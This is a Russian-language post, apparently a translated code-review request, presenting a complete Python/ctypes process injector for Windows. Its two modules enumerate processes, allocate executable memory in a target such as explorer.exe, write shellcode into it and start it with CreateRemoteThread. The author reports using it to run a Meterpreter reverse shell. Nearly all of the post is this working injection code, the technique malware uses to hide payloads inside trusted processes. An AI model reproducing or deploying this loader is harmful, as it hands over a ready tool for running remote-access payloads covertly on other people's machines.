Инжектор процессов с использованием ctypes и Windows API

Чтобы попрактиковаться в Windows API и ctypes, Я решил написать программу, способную внедрять и запускать шелл-код внутри другого указанного процесса.

Пример:

C:UsersAdminDesktop>python inject.py -n explorer.exe -s shellcode.txt
Remote memory address: 0x40a0000
Remote thread created. Thread ID: 7960
Closed Proc Handle

Это успешно запускает шеллкод, сохраненный в shellcode.txt (обратная оболочка Meterpreter) внутри explorer.exe в новой теме:

TCP соединение

Созданная нить

Он работает, открывая дескриптор целевого процесса, выделяя некоторую память, записывая шелл-код в эту память, а затем передавая этот адрес памяти в CreateRemoteThread.

Я хотел бы получить совет в основном по двум вопросам:

  • Использование Windows API. Я впервые использовал API напрямую. Я хотел бы знать, делаю ли я что-нибудь не так, прежде чем случайно сделаю это привычкой.

  • Использование ctypes: Я редко использую ctypes, и это самый сложный случай, в котором я когда-либо его использовал.

    • Я создаю много «типизированных псевдонимов» внешних вызовов с помощью помощника:

      def typed_f(function_ptr, arg_types, return_type):
          function_ptr.argtypes = arg_types
          function_ptr.restype = return_type
          return function_ptr
      
      create_snapshot = typed_f(kernel32.CreateToolhelp32Snapshot,
                        [cw.DWORD, cw.DWORD],
                        cw.HANDLE)
      

    Это типично? Есть ли лучший способ добиться того же?

Он состоит из двух частей: ctypes оболочки, а затем код, который использует оболочки для внедрения процесса.

process_helpers.py:

import ctypes as c
import ctypes.wintypes as cw
from typing import Optional, Iterator


TH32CS_SNAPPROCESS = 0x2  # Get snapshot of all processes
MAX_PATH_LENGTH = 255

INVALID_HANDLE_VALUE = -1


kernel32: c.WinDLL = c.windll.kernel32


class PROCESSENTRY32(c.Structure):
    _fields_ = [("dwSize", cw.DWORD),
                ("cntUsage", cw.DWORD),
                ("th32ProcessID", cw.DWORD),
                ("th32DefaultHeapID", cw.PULONG),
                ("th32ModuleID", cw.DWORD),
                ("cntThreads", cw.DWORD),
                ("th32ParentProcessID", cw.DWORD),
                ("pcPriClassBase", cw.LONG),
                ("dwFlags", cw.DWORD),
                ("szExeFile", cw.CHAR * MAX_PATH_LENGTH)]


LPPROCESSENTRY32 = c.POINTER(PROCESSENTRY32)


def typed_f(function_ptr, arg_types, return_type):
    function_ptr.argtypes = arg_types
    function_ptr.restype = return_type
    return function_ptr


create_snapshot = typed_f(kernel32.CreateToolhelp32Snapshot,
                          [cw.DWORD, cw.DWORD],
                          cw.HANDLE)

first_process = typed_f(kernel32.Process32First,
                        [cw.HANDLE, LPPROCESSENTRY32],
                        c.c_bool)

next_process = typed_f(kernel32.Process32Next,
                       [cw.HANDLE, LPPROCESSENTRY32],
                       c.c_bool)

close_handle = typed_f(kernel32.CloseHandle,
                       [cw.HANDLE],
                        c.c_bool)

open_process = typed_f(kernel32.OpenProcess,
                       [cw.DWORD, c.c_bool, cw.DWORD],
                       cw.HANDLE)

remote_virtual_alloc = typed_f(kernel32.VirtualAllocEx,
                               [cw.HANDLE, cw.LPVOID, c.c_size_t, cw.DWORD, cw.DWORD],
                               cw.LPVOID)

remote_virtual_free = typed_f(kernel32.VirtualFree,
                              [cw.HANDLE, cw.LPVOID, c.c_size_t, cw.DWORD],
                              c.c_bool)

# Needed when modifying executable memory.
flush_instruction_cache = typed_f(kernel32.FlushInstructionCache,
                                  [cw.HANDLE, cw.LPCVOID, c.c_size_t],
                                  c.c_bool)

remote_write_memory = typed_f(kernel32.WriteProcessMemory,
                              [cw.HANDLE, cw.LPVOID, cw.LPCVOID, c.c_size_t, c.POINTER(c.c_size_t)],
                              c.c_bool)

# FIXME: The second parameter isn't really a void pointer, it's a SECURITY_ATTRIBUTES pointer, but I don't think
#  we need it, and we'd need to define a custom Structure to specify it.
# FIXME: The same goes for the fourth parameter. It's not actually a void pointer; it's a LPTHREAD_START_ROUTINE, which
#  is a pointer to a function that takes a LPVOID (a pointer to a paramater struct), and returns a DWORD.
remote_thread_create = typed_f(kernel32.CreateRemoteThread,
                               [cw.HANDLE, cw.LPVOID, c.c_size_t, cw.LPVOID, cw.LPVOID, cw.DWORD, cw.LPDWORD],
                               cw.HANDLE)


def create_process_snapshot() -> cw.HANDLE:
    return create_snapshot(TH32CS_SNAPPROCESS, -1)


def list_processes() -> Optional[list[PROCESSENTRY32]]:
    """Returns a list of information about all active processes at the time the call is made, or
    None if a snapshot couldn't be taken."""
    snapshot = create_process_snapshot()

    if snapshot == INVALID_HANDLE_VALUE:
        return None

    try:
        proc_entry = PROCESSENTRY32()
        proc_entry.dwSize = c.sizeof(PROCESSENTRY32)
        read_success = first_process(snapshot, c.byref(proc_entry))

        entries = []
        while True:
            if read_success:
                entry_copy = PROCESSENTRY32()
                c.memmove(c.byref(entry_copy), c.byref(proc_entry), proc_entry.dwSize)
                entries.append(entry_copy)
            else:
                break
            read_success = next_process(snapshot, c.byref(proc_entry))
    finally:
        close_handle(snapshot)

    return entries


def get_process_ids(process_name: bytes) -> Iterator[int]:
    """Returns all process IDs at the time of calling, or nothing if a list of processes couldn't be obtained."""
    processes = list_processes()
    if processes is None:
        return

    for proc in processes:
        if proc.szExeFile == process_name:
            yield proc.th32ProcessID


def formatted_last_error(task_message: str) -> str:
    return f"Failed to {task_message}. Error: {kernel32.GetLastError()}"

inject.py

import ctypes as c
import ctypes.wintypes as cw
from argparse import ArgumentParser
from os import fsencode

import process_helpers as ph


# The permissions required to create a thread and write to the enclosing process' memory.
PROCESS_CREATE_THREAD = 0x2
PROCESS_VM_OPERATION = 0x8
PROCESS_VM_WRITE = 0x20
PROCESS_VM_READ = 0x10
PROCESS_QUERY_INFORMATION = 0x400

REQUIRED_RIGHTS_TO_INJECT = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION 
                            | PROCESS_VM_WRITE | PROCESS_VM_READ

PAGE_EXECUTE_READWRITE = 0x40


MEM_COMMIT = 0x1000
MEM_RELEASE = 0x8000

START_RUNNING = 0x0


def open_process_for_injection(pid: int) -> cw.HANDLE:
    proc_handle = ph.open_process(REQUIRED_RIGHTS_TO_INJECT, False, pid)
    if proc_handle is None:
        raise RuntimeError(ph.formatted_last_error("open process"))
    else:
        return proc_handle


def write_shellcode_to_process(process_handle: cw.HANDLE, shellcode: bytes) -> cw.LPVOID:
    shellcode_length = len(shellcode)
    # Allocate memory to write the shellcode to.
    remote_memory_addr = ph.remote_virtual_alloc(process_handle, None, shellcode_length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    if remote_memory_addr is None:
        raise RuntimeError(ph.formatted_last_error("allocate memory"))
    else:
        print("Remote memory address:", hex(remote_memory_addr))
        # TODO: Check for how much was written? Do we care?
        write_result = ph.remote_write_memory(process_handle, remote_memory_addr, shellcode, shellcode_length, None)
        if write_result:
            ph.flush_instruction_cache(process_handle, remote_memory_addr, shellcode_length)
            return remote_memory_addr
        else:
            raise RuntimeError(ph.formatted_last_error("write shellcode"))


def start_remote_thread(process_handle: cw.HANDLE, shellcode_address: cw.LPVOID) -> None:
    thread_id = cw.DWORD()
    thread_id_ptr = c.byref(thread_id)
    thread_handle = ph.remote_thread_create(process_handle,
                                            None,  # Default security
                                            0,  # Default stack size
                                            shellcode_address,
                                            None,  # No argument to pass
                                            START_RUNNING,
                                            thread_id_ptr)
    if thread_handle is None:
        raise RuntimeError(ph.formatted_last_error("start thread"))
    else:
        print("Remote thread created. Thread ID:", thread_id.value)


def inject_code(target_process_pid: int, shellcode: bytes) -> None:
    # Get a handle to the process so we can create a remote thread and write to it.
    proc_handle = open_process_for_injection(target_process_pid)
    try:
        shellcode_ptr = write_shellcode_to_process(proc_handle, shellcode)
        start_remote_thread(proc_handle, shellcode_ptr)
        # TODO: Currently leaking memory.
    finally:
        ph.close_handle(proc_handle)
        print("Closed Proc Handle")


def main():
    parser = ArgumentParser()
    parser.add_argument("-n", "--name",
                        help="Name of the process to inject into.")
    parser.add_argument("-s", "--shellcode",
                        help="The path to the shellcode to inject.")

    args = parser.parse_args()

    with open(args.shellcode, "rb") as f:
        shellcode = f.read()

    # A bit of an abuse of the function, but it reverses the decoding does to command-line arguments, since we need bytes.
    proc_name = fsencode(args.name)

    pids = ph.get_process_ids(proc_name)
    first_pid = next(pids, None)

    if first_pid is None:
        raise ValueError(f"Process {args.name} not found!")
    else:
        inject_code(first_pid, shellcode)


if __name__ == "__main__":
    main()

0

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *